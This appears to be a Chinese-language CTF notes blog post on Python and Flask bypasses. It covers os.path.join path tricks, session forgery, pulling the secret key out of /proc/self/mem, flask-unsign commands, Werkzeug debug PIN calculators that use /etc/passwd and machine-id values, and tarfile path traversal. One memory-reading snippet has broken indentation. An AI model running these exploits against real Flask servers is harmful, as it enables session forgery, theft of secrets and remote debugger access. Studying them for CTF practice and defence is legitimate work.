python绕过

2020-11-14 web python, 绕过 ∞ 评论

绕过

常见绕过

os.path.join()

如果一个参数是以/符号开头的，就将这个参数作为开头继续向后拼接。

os.path.join('uploads/', '/flag') => '/flag'

render_template()

模板渲染，缓存机制：首先会检查是否有缓存，如果缓存可用就使用缓存，缓存不可用就加载模板。

Cache_size 默认是 400，使用 LRUCache，默认将最常用的页面缓存起来，便于之后的使用，每次访问页面都会将这个页面放到cache的最前方，同时，处于cache后方的页面，由于长期得不到访问，在超过cache规定的最大限制之后，将会被移除出缓存中。

SSTI

见SSTI。

session伪造

在Flask中，session是保存在Cookie中，也就是本地，所以可以直接读取其内容，也就产生了Flask伪造session的漏洞。

secret key

python存储对象的位置在堆上。

app是实例化的Flask对象，而secret key在 app.config['SECRET_KEY']，可以通过读取 /proc/self/mem 来读取secret key。

读取堆栈分布

由于 /proc/self/mem 内容较多而且存在不可读写部分，直接读取会导致程序崩溃，所以先读取 /proc/self/maps 获取堆栈分布。

map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
    map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
    if map_addr:
        start = int(map_addr.group(1), 16)
        end = int(map_addr.group(2), 16)
        print("Found rw addr:", start, "-", end)

读取对应位置内存数据

然后读取 /proc/self/mem，读取对应位置的内存数据，再使用正则表达式查找内容。

res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
if "*abcdefgh" in res.text:
   secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
      if secret_key:
    print("Secret Key:", secret_key[0])

工具

flask-unsign

加密：

flask-unsign --sign --cookie "<Session CookieValue>" --secret '<Secretkey>'

解密：

flask-unsign --decode --cookie '<SessionCookieStructure>'

爆破key：

flask-unsign --unsign --cookie '<SessionCookieStructure>'

flask-session-cookie-manager

加密：

flask_session_cookie_manager{2,3}.py encode [-h] -s <SecretKey> -t <SessionCookieStructure>

解密：

flask_session_cookie_manager.py decode [-h] [-s <Secretkey>] -c <Session CookieValue>

解密脚本

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

参考
客户端 session 导致的安全问题

Flask debug PIN

PIN码是Flask在开启debug模式下，进行代码调试模式的进入密码，需要正确的PIN码才能进入调试模式。

计算逻辑位于 python3.x/site-packages/werkzeug/debug/__init__.py#get_pin_and_cookie_name，版本不同的区别在于3.6与3.8的md5加密和sha1加密不同。

PIN生成要素：

username
用户名。通过 getpass.getuser() 读取，通过文件读取 /etc/passwd。
modname
模块名。通过 getattr(mod,"file",None) 读取，默认值为 flask.app。
appname
应用名。通过 getattr(app,"name",type(app).name) 读取，默认值为 Flask。
moddir
Flask库下 app.py 的绝对路径。通过 getattr(mod,"file",None) 读取，实际应用中通过报错读取。
uuidnode
当前网络的mac地址的十进制数。通过 uuid.getnode() 读取，通过文件 /sys/class/net/eth0/address 得到16进制结果，转化为10进制进行计算。
machine_id
docker机器id。每一个机器都会有自已唯一的id，linux的id一般存放在 /etc/machine-id 或 /proc/sys/kernel/random/boot_id，docker靶机则读取 /proc/self/cgroup 或 /proc/self/mountinfo，其中第一行的 /docker/ 字符串后面的内容作为机器的id，在docker环境下读取后两个，非docker环境三个都需要读取。

PIN生成脚本：

# <3.8 MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'flaskweb'# username, /etc/passwd
     'flask.app',# modname, 默认值
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')), 默认值
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None), baox
]

private_bits = [
     '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

print(rv)

# >=3.8 sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377581187',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

参考：

ctfshow - web 801

GYCTF 2020 - FlaskApp

*CTF - oh-my-notepro

其他

tarfile模块

CVE-2007-4559

该漏洞影响到Python的tarfile模块，可造成系统文件的任意读取和写入。CVE-2007-4559的基本原理与CVE-2001-1267类似，当使用tar打包一个包含 ../../../../../etc/passwd，并用管理员权限解包时，/etc/passwd 文件会被覆盖，同理使用文件链接也可以产生同样的效果。

Lazzaro

CTF弱鸡自进阶